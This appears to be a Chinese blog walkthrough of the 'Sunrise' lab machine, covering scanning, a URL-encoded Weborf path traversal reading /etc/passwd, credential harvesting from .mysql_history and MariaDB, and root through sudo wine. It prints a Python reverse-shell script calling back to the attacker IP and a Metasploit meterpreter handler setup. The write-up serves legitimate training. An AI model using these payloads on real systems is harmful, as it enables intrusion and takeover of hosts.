天道酬勤

Sunrise-WALKTHROUGH

一、主机发现

使用netdiscover发现目标IP为192.168.203.140

二、端口探测

root@kali:~# nmap -sS -A 192.168.203.140 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 17:51 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.140
Host is up (0.00039s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http       Apache httpd 2.4.38
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /: Root directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.38: 
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2019-10097	6.0	https://vulners.com/cve/CVE-2019-10097
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2019-0215	6.0	https://vulners.com/cve/CVE-2019-0215
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2019-10081	5.0	https://vulners.com/cve/CVE-2019-10081
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|_    	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
3306/tcp open  mysql?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   NULL: 
|_    Host '192.168.203.129' is not allowed to connect to this MariaDB server
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open  http-proxy Weborf (GNU/Linux)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
|     Content-Length: 202
|     Content-Type: text/html
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   GetRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Content-Length: 326
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
|     </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|     DAV: 1,2
|     DAV: <http://apache.org/dav/propset/fs/1>
|     MS-Author-Via: DAV
|   Socks5: 
|     HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
|     Content-Length: 199
|     Content-Type: text/html
|_    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-enum: 
|   /../../../../../../../../../../etc/passwd: Possible path traversal in URI
|   /../../../../../../../../../../boot.ini: Possible path traversal in URI
|_  /html/: Potentially interesting folder
|_http-server-header: Weborf (GNU/Linux)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3306-TCP:V=7.80%I=7%D=2/21%Time=5E4FA832%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4E,"J\0\0\x01\xffj\x04Host\x20'192\.168\.203\.129'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.80%I=7%D=2/21%Time=5E4FA837%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,187,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\
SF:nContent-Length:\x20326\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C/
SF:/DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head><title>Weborf</
SF:title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><
SF:tr\x20style=\"background-color:\x20#DFDFDF;\"><td>d</td><td><a\x20href=
SF:\"html/\">html/</a></td><td>-</td></tr>\n</table><p>Generated\x20by\x20
SF:Weborf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>")%r(HTTPOptions,B2,"
SF:HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\nAllow:\x20GET
SF:,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV
SF::\x20<http://apache\.org/dav/propset/fs/1>\r\nMS-Author-Via:\x20DAV\r\n
SF:\r\n")%r(RTSPRequest,B2,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU
SF:/Linux\)\r\nAllow:\x20GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,M
SF:OVE\r\nDAV:\x201,2\r\nDAV:\x20<http://apache\.org/dav/propset/fs/1>\r\n
SF:MS-Author-Via:\x20DAV\r\n\r\n")%r(FourOhFourRequest,12B,"HTTP/1\.1\x204
SF:04\x20Page\x20not\x20found:\x20Weborf\x20\(GNU/Linux\)\r\nContent-Lengt
SF:h:\x20202\r\nContent-Type:\x20text/html\r\n\r\n<!DOCTYPE\x20HTML\x20PUB
SF:LIC\x20\"-//W3C//DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head
SF:><title>Weborf</title></head><body>\x20<H1>Error\x20404</H1>Page\x20not
SF:\x20found\x20<p>Generated\x20by\x20Weborf/0\.12\.2\x20\(GNU/Linux\)</p>
SF:</body></html>")%r(Socks5,125,"HTTP/1\.1\x20400\x20Bad\x20request:\x20W
SF:eborf\x20\(GNU/Linux\)\r\nContent-Length:\x20199\r\nContent-Type:\x20te
SF:xt/html\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x20
SF:4\.01\x20Transitional//EN\"><html><head><title>Weborf</title></head><bo
SF:dy>\x20<H1>Error\x20400</H1>Bad\x20request\x20<p>Generated\x20by\x20Web
SF:orf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>")%r(SIPOptions,B2,"HTTP
SF:/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\nAllow:\x20GET,POS
SF:T,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV:\x2
SF:0<http://apache\.org/dav/propset/fs/1>\r\nMS-Author-Via:\x20DAV\r\n\r\n
SF:");
MAC Address: 00:0C:29:0F:49:BE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.203.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.33 seconds

我说这次探测的时间咋这么长,原来是发现了一些不得了的东西。

开放的端口有228033068080

三、漏洞利用

查看了80端口,就是一个简单的目录遍历。

我们还是直接查看8080端口,根据扫描的结果来看是存在任意文件读取的。

http://192.168.203.140:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

这里我们要对斜杠进行url编码,否则不生效。

可以看到成功读取。

此漏洞呢,是weborf的一个目录遍历漏洞

原文地址:http://www.gltc.cn/31328.html

在读取到的/etc/passwd中,我们看到了用户weborf所在的目录,我们进行访问:

http://192.168.203.140:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

利用dirb尝试对目录进行扫描:

果然发现了点好东西:

.mysql_history

是数据库的账号和密码:

show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44'; 

尝试是否可以连接ssh:

使用平常一系列提权操作查看,并没有发现可以利用的提权点,最终选择进入mysql:

MariaDB [(none)]> show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database' at line 1
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
3 rows in set (0.001 sec)

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| transaction_registry      |
| user                      |
+---------------------------+
31 rows in set (0.001 sec)

MariaDB [mysql]> describe user;
+------------------------+-----------------------------------+------+-----+----------+-------+
| Field                  | Type                              | Null | Key | Default  | Extra |
+------------------------+-----------------------------------+------+-----+----------+-------+
| Host                   | char(60)                          | NO   | PRI |          |       |
| User                   | char(80)                          | NO   | PRI |          |       |
| Password               | char(41)                          | NO   |     |          |       |
| Select_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Insert_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Update_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Delete_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Create_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Drop_priv              | enum('N','Y')                     | NO   |     | N        |       |
| Reload_priv            | enum('N','Y')                     | NO   |     | N        |       |
| Shutdown_priv          | enum('N','Y')                     | NO   |     | N        |       |
| Process_priv           | enum('N','Y')                     | NO   |     | N        |       |
| File_priv              | enum('N','Y')                     | NO   |     | N        |       |
| Grant_priv             | enum('N','Y')                     | NO   |     | N        |       |
| References_priv        | enum('N','Y')                     | NO   |     | N        |       |
| Index_priv             | enum('N','Y')                     | NO   |     | N        |       |
| Alter_priv             | enum('N','Y')                     | NO   |     | N        |       |
| Show_db_priv           | enum('N','Y')                     | NO   |     | N        |       |
| Super_priv             | enum('N','Y')                     | NO   |     | N        |       |
| Create_tmp_table_priv  | enum('N','Y')                     | NO   |     | N        |       |
| Lock_tables_priv       | enum('N','Y')                     | NO   |     | N        |       |
| Execute_priv           | enum('N','Y')                     | NO   |     | N        |       |
| Repl_slave_priv        | enum('N','Y')                     | NO   |     | N        |       |
| Repl_client_priv       | enum('N','Y')                     | NO   |     | N        |       |
| Create_view_priv       | enum('N','Y')                     | NO   |     | N        |       |
| Show_view_priv         | enum('N','Y')                     | NO   |     | N        |       |
| Create_routine_priv    | enum('N','Y')                     | NO   |     | N        |       |
| Alter_routine_priv     | enum('N','Y')                     | NO   |     | N        |       |
| Create_user_priv       | enum('N','Y')                     | NO   |     | N        |       |
| Event_priv             | enum('N','Y')                     | NO   |     | N        |       |
| Trigger_priv           | enum('N','Y')                     | NO   |     | N        |       |
| Create_tablespace_priv | enum('N','Y')                     | NO   |     | N        |       |
| Delete_history_priv    | enum('N','Y')                     | NO   |     | N        |       |
| ssl_type               | enum('','ANY','X509','SPECIFIED') | NO   |     |          |       |
| ssl_cipher             | blob                              | NO   |     | NULL     |       |
| x509_issuer            | blob                              | NO   |     | NULL     |       |
| x509_subject           | blob                              | NO   |     | NULL     |       |
| max_questions          | int(11) unsigned                  | NO   |     | 0        |       |
| max_updates            | int(11) unsigned                  | NO   |     | 0        |       |
| max_connections        | int(11) unsigned                  | NO   |     | 0        |       |
| max_user_connections   | int(11)                           | NO   |     | 0        |       |
| plugin                 | char(64)                          | NO   |     |          |       |
| authentication_string  | text                              | NO   |     | NULL     |       |
| password_expired       | enum('N','Y')                     | NO   |     | N        |       |
| is_role                | enum('N','Y')                     | NO   |     | N        |       |
| default_role           | char(80)                          | NO   |     |          |       |
| max_statement_time     | decimal(12,6)                     | NO   |     | 0.000000 |       |
+------------------------+-----------------------------------+------+-----+----------+-------+
47 rows in set (0.002 sec)

MariaDB [mysql]> select User,Password from user;
+---------+-------------------------------------------+
| User    | Password                                  |
+---------+-------------------------------------------+
| root    | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 |
| sunrise | thefutureissobrightigottawearshades       |
| weborf  | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 |
+---------+-------------------------------------------+
3 rows in set (0.001 sec)

四、提权

我们得到了sunrise的账号和明文密码,root账户的密码带了加密,暂不清楚是什么加密,我们先登录账号看一下。

使用sudo -l,发现可以使用此账号运行root权限的wine

wine介绍:

Wine (“Wine Is Not an Emulator” 的递归缩写)是一个能够在多种 POSIX-compliant 操作系统(诸如 Linux,Mac OSX 及 BSD 等)上运行 Windows 应用的兼容层。

这里就很好理解了,使用wine运行一个exe木马,得到反弹shell的效果。我本来想通过pyinstaller封装一个py脚本的exe木马,但是我利用python写的脚本转换成exe之后,无法正常运行

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.203.129",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);

我也不清楚是怎么回事,希望有明白的大佬能够给我解释一下,谢谢!


我还是老老实实的使用msf吧。

可以看到生成了两个文件,一个是exe文件,一个是.rc说明文档。

我们先查看一下说明文档:

我们在msf中,根据说明文档进行配置,开启监听:

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.203.129
lhost => 192.168.203.129
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > set exitonsession false 
exitonsession => false
msf5 exploit(multi/handler) > set enablestageencoding true
enablestageencoding => true
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.203.129:443 

接下来,将exe木马传到目标机器上。

kali开启web服务:

root@kali:~# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...

我们可以看到现在已经拿到了root权限。

 

赞(1) 打赏
未经允许不得转载:HackerGu‘s Blog » Sunrise-WALKTHROUGH
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏